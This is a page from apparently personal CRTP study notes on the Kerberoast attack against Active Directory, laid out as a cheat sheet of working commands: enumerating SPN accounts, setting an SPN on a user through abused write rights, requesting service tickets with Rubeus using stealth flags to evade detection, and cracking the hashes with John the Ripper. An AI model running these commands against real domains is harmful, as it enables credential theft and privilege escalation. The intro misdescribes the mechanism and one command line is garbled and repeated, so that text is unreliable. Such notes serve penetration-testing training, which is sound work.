๐Ÿ› ๏ธ
CRTP Notes
  • ๐Ÿ› ๏ธCRTP Notes
  • โš™๏ธCRTP Methodology
  • ๐Ÿ’กMisc
    • PowerShell Basics
    • Bypass defenses
    • Transfer files
  • ๐Ÿ”จBasic enumeration
    • General
    • Network
    • Protection
  • โ›๏ธAD Enumeration
    • Gnereral
    • ACL
    • Forests and Trusts
  • ๐Ÿ”ชPrivilege Escalation
    • Local Privilege Escalation
    • Domain Privilege Escalation
      • Kerberoast
      • AS-REP Roasting
      • Delegations
    • Cross Domain Privilege Escalation
      • Trusts
      • AD CS
      • MSSQL Servers
  • ๐ŸŽ๏ธLateral Movement
    • WinRM
    • Credentials Dumping
    • DC Sync
    • Over Pass The Hash
    • Runas
  • ๐Ÿ”งPersistence
    • Kerberos
      • Golden Ticket
      • Silver Ticket
      • Diamond Ticket
    • Skeleton Key
    • DSRM
    • Custom SSP
    • AdminSDHolder
    • Security Descriptors
    • ACL
  • ๐Ÿ›ก๏ธMitigations
  • ๐Ÿ“šResources
    • AD attacking overall
    • Rubeus Guide
    • The Hacker Recipes
Powered by GitBook
On this page
  • SPNs
  • Find SPNs
  • Set SPNs
  • TGS
  • Crack

Was this helpful?

  1. Privilege Escalation
  2. Domain Privilege Escalation

Kerberoast

In a Kerberoast attack, the attacker requests a Kerberos session ticket (TGS) to retrieve the service account's NTLM hash, which is partially encrypted with the service account's hash. This hash is then cracked offline to extract the service account's password.

SPNs

Find SPNs

Get-DomainUser -SPN
Get-ADUser -Filter {Servicer -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalNameGet-ADUser -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalNameGet-ADUser -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalName

Set SPNs

With enough rights (GenericAll/GenericWrite), a target user's SPN can be set

# Find Permissions - for example RDPUsers group
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

# Set SPN
Set-DomainObject -Identity support1user -Set @{serviceprincipalname=โ€˜dcorp/whatever1'}


TGS

# try to downgrade to RC4-HMAC and get hashes
Rubeus.exe kerberoast 

# to avoid detections look for Kerberoastable accounts that only support RC4_HMAC
Rubeus.exe kerberoast /rc4opsec

# Specific SPN - more stealth
Rubeus.exe kerberoast /user:svcadmin  /rc4opsec

# usefull flags
/outfile:hashes.txt # output the hashes into file
/simple # hashes are output in the console one per line
/nowrap # results will not be line wrapped
/stats # will output statistics about kerberoastable users found

Crack

john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt

Last updated 7 months ago

Was this helpful?

๐Ÿ”ช